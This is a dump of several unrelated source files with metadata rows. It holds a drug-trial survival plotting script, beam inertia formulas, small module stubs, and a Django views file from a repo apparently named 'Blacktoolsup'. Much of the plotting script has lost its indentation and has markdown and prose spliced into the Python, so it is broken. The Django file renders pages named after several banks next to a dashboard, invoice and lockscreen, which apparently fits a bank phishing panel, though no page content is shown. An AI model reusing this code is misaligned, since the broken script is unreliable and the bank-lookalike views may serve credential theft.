check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}-all.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}-all.pdf'.format(model, contrl_type))
plt.show()
plt.close()  # close (not just clear) the figure to free memory
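# Both box-plot routines rely on bootstrap_mean_pvalue_2samples (defined
# elsewhere in this project) for the pairwise tests. As a rough, hypothetical
# sketch of such a two-sample test on the difference of means -- a
# permutation-style resampling test, NOT the project's exact implementation:

```python
import numpy as np

def bootstrap_mean_pvalue_2samples_sketch(a, b, n_boot=500, seed=0):
    """Permutation-style p-value for H0: mean(a) == mean(b) (illustrative)."""
    rng = np.random.RandomState(seed)
    observed = abs(a.mean() - b.mean())
    pooled = np.concatenate([a, b])
    count = 0
    for _ in range(n_boot):
        perm = rng.permutation(pooled)  # reshuffle group labels
        diff = abs(perm[:len(a)].mean() - perm[len(a):].mean())
        if diff >= observed:
            count += 1
    # add-one smoothing keeps the p-value strictly positive
    return (count + 1) / (n_boot + 1)
```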
def box_plot_ate(cohort_dir_name, model, model2='LSTM', contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dirname2 = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model2)
df_all = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model),
dtype={'drug': str},
sheet_name=None)
df_all2 = pd.read_excel(dirname2 + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model2),
dtype={'drug': str},
sheet_name=None)
df = df_all[contrl_type]
# Only select drugs with selection criteria trial
# 1. minimum support set 10, may choose 20 later
# 2. p value < 0.05
idx = (df['support'] >= MIN_SUPPORT) & (df['pvalue-KM1-0_IPTW'] <= 0.05)
df_sort = df.loc[idx, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
df2 = df_all2[contrl_type]
idx2 = (df2['support'] >= MIN_SUPPORT) & (df2['pvalue-KM1-0_IPTW'] <= 0.05)
df_sort2 = df2.loc[idx2, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
data_1 = []
data_2 = []
data_pvalue = []
drug_list = df_sort['drug'].tolist()
drug_name_list = df_sort['drug_name'].tolist()
drug_name_list = [s[:18] for s in drug_name_list]
drug_list2 = df_sort2['drug'].tolist()
print('len(drug_list):', len(drug_list), 'len(drug_list2):', len(drug_list2))
N = len(drug_list)
n_box = 2
for drug in drug_list:
rdf = pd.read_excel(dirname + 'results/' + drug + '_results.xlsx')
if contrl_type != 'all':
idx_all = (rdf['ctrl_type'] == contrl_type)
else:
idx_all = (rdf['ctrl_type'].notna())
# Only select balanced trial
idx = idx_all & (rdf['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
c = "KM1-0_IPTW" # "ATE_original", "ATE_IPTW", "KM1-0_original", "KM1-0_IPTW", 'HR_ori', 'HR_IPTW'
nv = rdf.loc[idx, c]
data_1.append(np.array(rdf.loc[idx, c]) * 100)
rdf2 = pd.read_excel(dirname2 + 'results/' + drug + '_results.xlsx')
if contrl_type != 'all':
idx_all2 = (rdf2['ctrl_type'] == contrl_type)  # was rdf: must filter the second model's results
else:
idx_all2 = (rdf2['ctrl_type'].notna())
# Only select balanced trials
idx2 = idx_all2 & (rdf2['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
nv2 = rdf2.loc[idx2, c]
if drug in drug_list2:
data_2.append(np.array(rdf2.loc[idx2, c]) * 100)
else:
data_2.append(np.array([]))
# if len(nv) > 0:
# med = IQR(nv)[0]
# iqr = IQR(nv)[1:]
#
# mean = nv.mean()
# mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
#
# if 'HR' in c:
# p, _ = bootstrap_mean_pvalue(nv, expected_mean=1)
# else:
# p, _ = bootstrap_mean_pvalue(nv, expected_mean=0)
#
# r.extend([med, iqr, mean, mean_ci, p])
# else:
# r.extend([np.nan, np.nan, np.nan, np.nan, np.nan])
colors = ['#F65453', '#82A2D3', '#FAC200']
fig, ax = plt.subplots(figsize=(38, 8))
width = 0.5 # the width of the bars
ind = np.arange(N) * width * (n_box + 1) # the x locations for the groups
sym = 'o'
# 'meanline':True,
box_kw = {"sym": sym, "widths": width - 0.04, "patch_artist": True, "notch": True,
'showmeans': True, # 'meanline':True,
"meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='black', marker='^',
markerfacecolor="None")}
rects1 = plt.boxplot(data_1, positions=ind, **box_kw)
rects2 = plt.boxplot(data_2, positions=ind + width, **box_kw)
# rects3 = plt.boxplot(data_3, positions=ind + 2 * width + 0.08, **box_kw)
def plot_strip(ind, data, color):
w = width - 0.15
swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
columns=['x', 'y'])
strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
# sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=.6, c=color)
# plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=1, facecolors='none', edgecolors=color) # c=color) #,
# ticks = list(drug_name_list)
for i, bplot in enumerate([rects1, rects2]):
for patch in bplot['boxes']:
patch.set_facecolor(colors[i])
r, g, b, a = patch.get_facecolor()
patch.set_facecolor((r, g, b, .6))
# plt.setp(bplot['boxes'], color=color)
# plt.setp(bplot['whiskers'], color=color)
# plt.setp(bplot['caps'], color=color)
plt.setp(bplot['medians'], color='black')
plot_strip(ind, data_1, colors[0])
plot_strip(ind + width, data_2, colors[1])
# plot_strip(ind + 2 * width + 0.08, data_3, colors[2])
# plt.ylim([0.5, 0.85])
ax.set_xticks(ind + width / 2)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Adjusted survival difference %", fontsize=25)
plt.axhline(y=0., color='black', linestyle='--')
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
for i in range(N):
n1 = len(data_1[i])
n2 = len(data_2[i])
y1 = max(data_1[i]) * 1.02
try:
y2 = max(data_2[i]) * 1.02
except ValueError:  # data_2[i] is empty when the drug is absent from model2's list
y2 = y1
x1 = ind[i]
x2 = ind[i] + width
ax.text(x1, y1, str(n1), ha='center', va='bottom', fontsize=14)
ax.text(x2, y2, str(n2), ha='center', va='bottom', fontsize=14)
    # def labelvalue(rects, x, y, p):
    #     for i, rect in enumerate(rects):
    #         ax.text(x[i], y[i],
    #                 significance(p[i]),
    #                 ha='center', va='bottom', fontsize=11)
    #
    # labelvalue(rects1["boxes"], ind - 0.08, np.max(data_1, axis=1)*1.01, np.array(data_pvalue)[:,0])
    # labelvalue(rects2["boxes"], ind + width, np.max(data_2, axis=1)*1.01, np.array(data_pvalue)[:,1])

    # p_v = np.array(data_pvalue)
    # for i in range(N):
    #     d = 0.008
    #     y = np.max([data_1[i].max(), data_2[i].max(), data_3[i].max()]) * 1.01  # rect.get_height()
    #     x = ind[i] + 2 * width + 0.08  # + width/2
    #     x1 = ind[i] - 0.08  # - width/2
    #     x2 = ind[i] + width  # - width/2
    #
    #     # auc v.s. smd
    #     l, r = x - 0.5 * width, x2 - 0.08
    #     ax.plot([x1, x1, (x2 + x1) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
    #     ax.plot([(x2 + x1) / 2, x2 - 0.08, x2 - 0.08], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
    #     ax.text((x2 + x1) / 2, y + d, significance(p_v[i, 2]), ha='center', va='bottom', fontsize=12)
    #
    #     # auc v.s. final
    #     ax.plot([x1, x1, (x + x1) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
    #     ax.plot([(x + x1) / 2, x, x], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
    #     # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c="black")
    #     ax.text((x + x1) / 2, y + 3 * d, significance(p_v[i, 0]), ha='center', va='bottom', fontsize=12)
    #
    #     # smd v.s. final
    #     ax.plot([x2 + 0.08, x2 + 0.08, (x + x2) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
    #     ax.plot([(x + x2) / 2, x, x], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
    #     # ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c="black")
    #     ax.text((x + x2) / 2, y + 1 * d, significance(p_v[i, 1]), ha='center', va='bottom', fontsize=12)
    ax.legend((rects1["boxes"][0], rects2["boxes"][0]),
              (model, model2), fontsize=20)
    ax.set_xmargin(0.01)
    plt.tight_layout()
    if dump:
        check_and_mkdir(dirname + 'results/fig/')
        fig.savefig(
            dirname + 'results/fig/adjusted_survival_diff_boxplot-{}-{}-{}.png'.format(model, model2, contrl_type))
        fig.savefig(
            dirname + 'results/fig/adjusted_survival_diff_boxplot-{}-{}-{}.pdf'.format(model, model2, contrl_type))
    plt.show()
    # plt.clf()
    plt.close()


def box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='random', dump=True):
    dirname_list = []
    df_all_list = []
    data_list = []
    for model in models:
        dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
        df_all = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model),
                               dtype={'drug': str},
                               sheet_name=None)
        dirname_list.append(dirname)
        df_all_list.append(df_all)
        df = df_all[contrl_type]
        # Only keep drug trials that meet the selection criteria:
        # 1. minimum support of 10 (may raise to 20 later)
        # 2. p-value < 0.05
        idx = (df['support'] >= MIN_SUPPORT) & (df['pvalue-KM1-0_IPTW'] <= 0.05)
        df_sort = df.loc[idx, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
        data = []
        data_pvalue = []
        if model == 'LR':
            drug_list = df_sort['drug'].tolist()
            drug_name_list = df_sort['drug_name'].tolist()
            print('len(drug_list):', len(drug_list))
            N = len(drug_list)
            n_box = len(models)
        drug_list2 = df_sort['drug'].tolist()
        for drug in drug_list:
            rdf = pd.read_excel(dirname + 'results/' + drug + '_results.xlsx')
            if contrl_type != 'all':
                idx_all = (rdf['ctrl_type'] == contrl_type)
            else:
                idx_all = (rdf['ctrl_type'].notna())
            # Only keep balanced trials
            idx = idx_all & (rdf['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
            c = "KM1-0_IPTW"  # "ATE_original", "ATE_IPTW", "KM1-0_original", "KM1-0_IPTW", 'HR_ori', 'HR_IPTW'
            nv = rdf.loc[idx, c]
            if drug in drug_list2:
                data.append(np.array(rdf.loc[idx, c]) * 100)
            else:
                data.append(np.array([]))
        data_list.append(data)
    colors = ['#F65453', '#82A2D3', '#FAC200', 'purple']
    fig, ax = plt.subplots(figsize=(18, 8))
    width = 0.5  # the width of the bars
    ind = np.arange(N) * width * (n_box + 1)  # the x locations for the groups
    sym = 'o'
    # 'meanline': True,
    box_kw = {"sym": sym, "widths": width - 0.04, "patch_artist": True, "notch": True,
              'showmeans': True,  # 'meanline': True,
              "meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='black', marker='^',
                                markerfacecolor="None")}
    rects_list = []
    for i in range(len(data_list)):
        rects = plt.boxplot(data_list[i], positions=ind + i * width, **box_kw)
        rects_list.append(rects)

    def plot_strip(ind, data, color):
        w = width - 0.15
        swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
                              columns=['x', 'y'])
        strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
        # sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
        plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=.6, c=color)
        # plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=1, facecolors='none', edgecolors=color)

    # ticks = list(drug_name_list)
    for i, bplot in enumerate(rects_list):
        for patch in bplot['boxes']:
            patch.set_facecolor(colors[i])
            r, g, b, a = patch.get_facecolor()
            patch.set_facecolor((r, g, b, .6))
        # plt.setp(bplot['boxes'], color=color)
        # plt.setp(bplot['whiskers'], color=color)
        # plt.setp(bplot['caps'], color=color)
        plt.setp(bplot['medians'], color='black')
    for i in range(len(data_list)):
        plot_strip(ind + i * width, data_list[i], colors[i])

    # plt.ylim([0.5, 0.85])
    ax.set_xticks(ind + width / 2)
    ax.spines['top'].set_visible(False)
    ax.spines['right'].set_visible(False)
    ax.spines['left'].set_visible(False)
    # ax.spines['bottom'].set_color('#DDDDDD')
    ax.set_axisbelow(True)
    ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
    ax.yaxis.grid(True, color='#EEEEEE', which='both')
    ax.xaxis.grid(False)
    ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
    ax.tick_params(axis='both', which='major', labelsize=20)
    ax.set_xlabel("Drug Trials", fontsize=25)
    ax.set_ylabel("Adjusted survival difference %", fontsize=25)
    plt.axhline(y=0., color='black', linestyle='--')

    def significance(val):
        if val < 0.001:
            return '***'
        elif val < 0.01:
            return '**'
        elif val < 0.05:
            return '*'
        else:
            return 'ns'

    # for d in range(len(data_list)):
    #     data = data_list[d]
    #     for i in range(N):
    #         n1 = len(data[i])
    #         n2 = len(data_2[i])
    #         y1 = max(data_1[i]) * 1.02
    #         try:
    #             y2 = max(data_2[i]) * 1.02
    #         except:
    #             y2 = y1
    #         x1 = ind[i]
    #         x2 = ind[i] + width
    #         ax.text(x1, y1, str(n1), ha='center', va='bottom', fontsize=14)
    #         ax.text(x2, y2, str(n2), ha='center', va='bottom', fontsize=14)
    ax.legend([rects["boxes"][0] for rects in rects_list],
              [m if m != 'LIGHTGBM' else 'GBM' for m in models], fontsize=20)
    ax.set_xmargin(0.01)
    plt.tight_layout()
    if dump:
        dirname = dirname_list[0]
        check_and_mkdir(dirname + 'results/fig/')
        fig.savefig(
            dirname + 'results/fig/adjusted_survival_diff_boxplot-modelall-{}.png'.format(contrl_type))
        fig.savefig(
            dirname + 'results/fig/adjusted_survival_diff_boxplot-modelall-{}.pdf'.format(contrl_type))
    plt.show()
    plt.clf()


if __name__ == '__main__':
    # check_drug_name_code()

    # test bootstrap method
    # rvs = stats.norm.rvs(loc=0, scale=10, size=(100, 1))
    # # ci = bootstrap_mean_ci(rvs)
    # # p, test_orig = bootstrap_mean_pvalue(rvs, expected_mean=0., B=1000)
    #
    # rvs2 = stats.norm.rvs(loc=0, scale=10, size=(100, 1))
    # p, test_orig = bootstrap_mean_pvalue_2samples(rvs, rvs2)

    with open(r'pickles/_gpi_ingredients_nameset_cnt.pkl', 'rb') as f:
        # change later: move this file into pickles/ as well
        gpiing_names_cnt = pickle.load(f)
    drug_name = {}
    for key, val in gpiing_names_cnt.items():
        drug_name[key] = '/'.join(val[0])
        # drug_name[key] = min(val[0], key=len)
    print('Using GPI vocabulary, len(drug_name) :', len(drug_name))

    # shell_for_ml_marketscan_stats_exist(cohort_dir_name='save_cohort_all_loose', model='LR', niter=10)
    # shell_for_ml_marketscan(cohort_dir_name='save_cohort_all_loose', model='LR', niter=50)  # too slow to get --stats
    # split_shell_file("shell_LR_save_cohort_all_loose_marketscan.sh", divide=4, skip_first=1)
    #
    # shell_for_ml_marketscan(cohort_dir_name='save_cohort_all_loose', model='LIGHTGBM', niter=50, stats=False)
    # split_shell_file("shell_LIGHTGBM_save_cohort_all_loose_marketscan.sh", divide=4, skip_first=1)
    shell_for_ml_marketscan(cohort_dir_name='save_cohort_all_loose', model='LSTM', niter=50, stats=False,
                            more_para='--epochs 10 --batch_size 128', selected=True)
    split_shell_file("shell_LSTM_save_cohort_all_loose_marketscan.sh", divide=3, skip_first=1)

    # shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='LR', niter=50)
    # shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='LIGHTGBM', niter=50, stats=False)
    # shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='MLP', niter=50, stats=False)
    # split_shell_file("shell_MLP_save_cohort_all_loose.sh", divide=4, skip_first=1)
    # shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='LSTM', niter=50, stats=False,
    #              more_para='--epochs 10 --batch_size 128')
    # split_shell_file("shell_LSTM_save_cohort_all_loose.sh", divide=4, skip_first=1)

    cohort_dir_name = 'save_cohort_all_loose'
    model = 'LR'  # 'MLP' # 'LIGHTGBM' # 'LSTM'

    # results_model_selection_for_ml(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name, niter=50)
    # results_model_selection_for_ml_step2(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name)
    # results_model_selection_for_ml_step2More(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name)
    #
    # results_ATE_for_ml(cohort_dir_name=cohort_dir_name, model=model, niter=50)
    # results_ATE_for_ml_step2(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name)
    # results_ATE_for_ml_step3_finalInfo(cohort_dir_name, model)
    #
    # combine_ate_final_LR_with(cohort_dir_name, 'LSTM')  # needs to compute the LSTM case first
    #
    # # major plots from 3 methods
    # bar_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
    # bar_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
    # bar_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
    #
    # box_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
    # box_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
    # box_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
    # box_plot_ate(cohort_dir_name, model=model, model2='LR', contrl_type='all')
    #
    # # all methods plots in appendix
    # bar_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
    # bar_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
    # bar_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
    #
    # box_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
    # box_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
    # box_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
    #
    # box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='all')
    # box_plot_ate(cohort_dir_name, model=model, model2='LIGHTGBM', contrl_type='all')
    # box_plot_ate(cohort_dir_name, model=model, model2='LSTM', contrl_type='all')
    #
    # box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='atc')
    # box_plot_ate(cohort_dir_name, model=model, model2='LIGHTGBM', contrl_type='atc')
    # box_plot_ate(cohort_dir_name, model=model, model2='LSTM', contrl_type='atc')
    #
    # box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='random')
    # box_plot_ate(cohort_dir_name, model=model, model2='LIGHTGBM', contrl_type='random')
    # box_plot_ate(cohort_dir_name, model=model, model2='LSTM', contrl_type='random')

    # box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='random')
    # box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='atc')
    # box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='all')

    print('Done')
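The slot arithmetic shared by the plotting functions above (`ind = np.arange(N) * width * (n_box + 1)`, with model `i` offset by `i * width`) is easy to sanity-check in isolation. A standalone sketch, separate from this script, with illustrative sizes:

```python
# Pure-Python mirror of the grouped-boxplot slot layout (numpy-free so it runs anywhere).
N, n_box, width = 3, 4, 0.5                        # 3 drug groups, 4 models per group
ind = [k * width * (n_box + 1) for k in range(N)]  # leftmost slot of each group
print(ind)  # [0.0, 2.5, 5.0]
for i in range(n_box):
    # These are the `positions=` handed to boxplot() for model i.
    print(i, [x + i * width for x in ind])
```

Each group of `n_box` boxes is followed by one empty slot of width `width`, which is what keeps adjacent drug groups visually separated.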
| 48.029796 | 157 | 0.576039 | 13,122 | 91,881 | 3.809785 | 0.050069 | 0.020883 | 0.030165 | 0.024484 | 0.863758 | 0.836394 | 0.81175 | 0.779945 | 0.743379 | 0.720015 | 0 | 0.032686 | 0.259455 | 91,881 | 1,912 | 158 | 48.054916 | 0.702037 | 0.214342 | 0 | 0.576983 | 0 | 0 | 0.18443 | 0.091887 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028771 | false | 0 | 0.01633 | 0.000778 | 0.070762 | 0.031104 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
10c45f51027411137b2c9730230dcbbe3f1e2a5e | 21 | py | Python | example_project/some_modules/third_modules/a116.py | Yuriy-Leonov/cython_imports_limit_issue | 2f9e7c02798fb52185dabfe6ce3811c439ca2839 | [
"MIT"
] | null | null | null | example_project/some_modules/third_modules/a116.py | Yuriy-Leonov/cython_imports_limit_issue | 2f9e7c02798fb52185dabfe6ce3811c439ca2839 | [
"MIT"
] | null | null | null | example_project/some_modules/third_modules/a116.py | Yuriy-Leonov/cython_imports_limit_issue | 2f9e7c02798fb52185dabfe6ce3811c439ca2839 | [
"MIT"
] | null | null | null | class A116:
    pass
| 7 | 11 | 0.619048 | 3 | 21 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 0.333333 | 21 | 2 | 12 | 10.5 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
10d17f58ba1b1c70d4aef7e7914ceccef51ade98 | 1,038 | py | Python | server/beam/utilities/IFinder.py | tweakyllama/beam-app | 147bb6832c81e45b89566f58ea8dfe1dcded2078 | [
"MIT"
] | null | null | null | server/beam/utilities/IFinder.py | tweakyllama/beam-app | 147bb6832c81e45b89566f58ea8dfe1dcded2078 | [
"MIT"
] | null | null | null | server/beam/utilities/IFinder.py | tweakyllama/beam-app | 147bb6832c81e45b89566f58ea8dfe1dcded2078 | [
"MIT"
] | null | null | null | from numpy import pi
def rectangle(width, height):
    return (width * height ** 3) / 12


def circle(radius):
    return (pi * radius ** 4) / 4


def i_beam(total_width, total_height, bar_width, bar_height):
    return rectangle(total_width, total_height) - rectangle(total_width - bar_width, total_height - 2 * bar_height)


def t_beam(total_width, total_height, bar_width, bar_height):
    a1 = total_width * bar_height
    a2 = bar_width * (total_height - bar_height)
    y_bar = ((a1 * (total_height - bar_height / 2)) + (a2 * (total_height - bar_height) / 2)) / (a1 + a2)
    I1 = rectangle(total_width, bar_height)
    I2 = rectangle(bar_width, (total_height - bar_height))
    # Parallel axis theorem
    I1 += a1 * ((total_height - bar_height / 2) - y_bar) ** 2
    I2 += a2 * ((total_height - bar_height) / 2 - y_bar) ** 2
    return I1 + I2


def c_beam(total_width, total_height, bar_width, bar_height):
    return rectangle(total_width, total_height) - rectangle(total_width - bar_width, total_height - 2 * bar_height)
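A quick standalone check of the formulas above (it repeats `rectangle` and `t_beam` so it can run on its own): a solid 4x6 rectangle gives I = 4*6**3/12 = 72, and a degenerate T-beam whose flange fills the entire depth reduces to a plain rectangle because both parallel-axis terms vanish.

```python
# Standalone sanity sketch, duplicating the module's formulas; in the module
# itself you would call rectangle()/t_beam() directly.
def rectangle(width, height):
    return (width * height ** 3) / 12

def t_beam(total_width, total_height, bar_width, bar_height):
    a1 = total_width * bar_height
    a2 = bar_width * (total_height - bar_height)
    y_bar = ((a1 * (total_height - bar_height / 2)) + (a2 * (total_height - bar_height) / 2)) / (a1 + a2)
    I1 = rectangle(total_width, bar_height) + a1 * ((total_height - bar_height / 2) - y_bar) ** 2
    I2 = rectangle(bar_width, total_height - bar_height) + a2 * ((total_height - bar_height) / 2 - y_bar) ** 2
    return I1 + I2

assert rectangle(4, 6) == 72.0                       # 4 * 6**3 / 12
# Flange filling the whole depth -> same I as the enclosing rectangle:
assert abs(t_beam(4, 6, 1, 6) - rectangle(4, 6)) < 1e-9
```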
| 30.529412 | 115 | 0.682081 | 154 | 1,038 | 4.285714 | 0.188312 | 0.216667 | 0.218182 | 0.181818 | 0.684848 | 0.684848 | 0.524242 | 0.524242 | 0.445455 | 0.381818 | 0 | 0.032491 | 0.199422 | 1,038 | 33 | 116 | 31.454545 | 0.761733 | 0.020231 | 0 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0 | 0.055556 | 0.222222 | 0.611111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
10efee5e033d2a24bf49c842de5d3731d1910270 | 104 | py | Python | squawk/utils/__init__.py | daemon/squawk | df6443a200f8bfef7d5338d8577fc30eac4f49b9 | [
"MIT"
] | null | null | null | squawk/utils/__init__.py | daemon/squawk | df6443a200f8bfef7d5338d8577fc30eac4f49b9 | [
"MIT"
] | null | null | null | squawk/utils/__init__.py | daemon/squawk | df6443a200f8bfef7d5338d8577fc30eac4f49b9 | [
"MIT"
] | null | null | null | from .concurrency import *
from .dataclass import *
from .torch_utils import *
from .workspace import *
| 20.8 | 26 | 0.769231 | 13 | 104 | 6.076923 | 0.538462 | 0.379747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 104 | 4 | 27 | 26 | 0.897727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8016412d8b9604fc4484037e24f8879490f48637 | 2,317 | py | Python | Cryptotrade/bitcotrade/views.py | joseph-njogu/Blacktoolsup | d2b454a194396b20e1d5411cf6da7605adb20c5a | [
"MIT"
] | null | null | null | Cryptotrade/bitcotrade/views.py | joseph-njogu/Blacktoolsup | d2b454a194396b20e1d5411cf6da7605adb20c5a | [
"MIT"
] | null | null | null | Cryptotrade/bitcotrade/views.py | joseph-njogu/Blacktoolsup | d2b454a194396b20e1d5411cf6da7605adb20c5a | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from rest_framework.authtoken.models import Token
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import AllowAny
from rest_framework.status import (
    HTTP_400_BAD_REQUEST,
    HTTP_404_NOT_FOUND,
    HTTP_200_OK
)
from rest_framework.response import Response


# def index(request):
#     return render(request, 'index.html')


@csrf_exempt
# POST method only
@api_view(["POST"])
@permission_classes((AllowAny,))
def login(request):
    username = request.data.get("username")
    password = request.data.get("password")
    if username is None or password is None:
        return Response({'error': 'Please provide both username and password'},
                        status=HTTP_400_BAD_REQUEST)
    user = authenticate(username=username, password=password)
    if not user:
        return Response({'error': 'Invalid Credentials'},
                        status=HTTP_404_NOT_FOUND)
    token, _ = Token.objects.get_or_create(user=user)
    return Response({'token': token.key},
                    status=HTTP_200_OK)
def woodforest(request):
    return render(request, 'woodforest.html')

def dashboard(request):
    return render(request, 'dashboard.html')

def invoice(request):
    return render(request, 'invoice.html')

def huntington(request):
    return render(request, 'huntington.html')

def barclays(request):
    return render(request, 'barclays.html')

def bbt(request):
    return render(request, 'bbt.html')

def bbva(request):
    return render(request, 'bbva.html')

def chase(request):
    return render(request, 'chase.html')

def citi(request):
    return render(request, 'citi.html')

def nfcu(request):
    return render(request, 'nfcu.html')

def pnc(request):
    return render(request, 'pnc.html')

def rbc(request):
    return render(request, 'rbc.html')

def scotia(request):
    return render(request, 'scotia.html')

def suntrust(request):
    return render(request, 'suntrust.html')

def logout(request):
    return render(request, 'lockscreen.html')
